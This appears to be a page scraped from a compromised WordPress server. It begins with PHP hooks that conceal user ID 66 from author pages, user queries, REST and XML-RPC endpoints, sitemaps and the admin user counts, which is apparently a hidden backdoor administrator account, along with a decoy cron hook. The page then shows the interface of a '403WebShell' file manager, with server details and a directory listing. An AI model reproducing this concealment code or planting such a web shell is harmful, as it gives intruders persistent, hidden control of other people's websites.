add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 66;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 66 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 66;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 66;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 66;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 66;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
403WebShell 403Webshell
Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000 ) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : / proc /self /root /usr /share /perl5 / Upload File :
[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
July 22 2026 17:55:20
root / root
0755
Algorithm
--
July 13 2025 14:00:25
root / root
0755
Authen
--
July 13 2025 14:00:53
root / root
0755
CGI
--
November 06 2024 08:35:25
root / root
0755
Data
--
July 13 2025 14:00:25
root / root
0755
Date
--
November 06 2024 08:35:25
root / root
0755
Debconf
--
August 27 2024 14:20:08
root / root
0755
Debian
--
August 27 2024 14:24:56
root / root
0755
Dpkg
--
May 09 2026 04:43:02
root / root
0755
Encode
--
November 06 2024 08:35:25
root / root
0755
Error
--
August 27 2024 14:31:46
root / root
0755
File
--
September 21 2025 05:33:09
root / root
0755
Font
--
July 13 2025 14:00:27
root / root
0755
Git
--
July 10 2025 06:24:52
root / root
0755
HTML
--
July 13 2025 14:00:28
root / root
0755
HTTP
--
July 25 2026 04:34:36
root / root
0755
IO
--
September 21 2025 05:33:09
root / root
0755
JSON
--
March 22 2026 09:42:55
root / root
0755
LWP
--
June 11 2026 05:03:35
root / root
0755
Locale
--
August 27 2024 14:24:55
root / root
0755
Mail
--
July 13 2025 14:00:41
root / root
0755
Module
--
November 21 2024 09:19:34
root / root
0755
NeedRestart
--
December 06 2024 06:41:24
root / root
0755
Net
--
August 31 2025 16:22:40
root / root
0755
Sort
--
August 27 2024 14:24:56
root / root
0755
Text
--
August 27 2024 14:31:46
root / root
0755
Time
--
November 06 2024 08:35:25
root / root
0755
Try
--
July 13 2025 14:00:41
root / root
0755
Types
--
March 22 2026 09:42:55
root / root
0755
URI
--
November 06 2024 08:35:24
root / root
0755
WWW
--
July 13 2025 14:00:41
root / root
0755
CGI.pm
122.864 KB
March 06 2024 15:15:49
root / root
0644
CGI.pod
67.271 KB
May 02 2023 12:00:41
root / root
0644
DebianLinux.pm
5.281 KB
February 18 2026 06:21:20
root / root
0644
Dpkg.pm
5.684 KB
May 06 2026 17:38:18
root / root
0644
Error.pm
29.445 KB
August 27 2024 14:31:46
root / root
0644
Fh.pm
0.162 KB
March 06 2024 15:15:57
root / root
0644
Git.pm
46.957 KB
July 02 2025 20:23:42
root / root
0644
JSON.pm
61.053 KB
October 09 2022 00:09:26
root / root
0644
LWP.pm
21.149 KB
January 25 2024 18:31:29
root / root
0644
MailTools.pm
0.447 KB
May 21 2019 14:26:37
root / root
0644
MailTools.pod
2.239 KB
May 21 2019 14:26:37
root / root
0644
NeedRestart.pm
5.878 KB
May 17 2022 14:59:22
root / root
0644
PgCommon.pm
44.349 KB
October 19 2023 12:38:23
root / root
0644
TimeDate.pm
0.261 KB
May 19 2020 17:30:43
root / root
0644
URI.pm
40.656 KB
February 09 2024 15:01:28
root / root
0644
lwpcook.pod
9.048 KB
January 25 2024 18:31:29
root / root
0644
lwptut.pod
24.365 KB
January 25 2024 18:31:29
root / root
0644
Youez - 2016 - github.com/yon3zuLinuXploit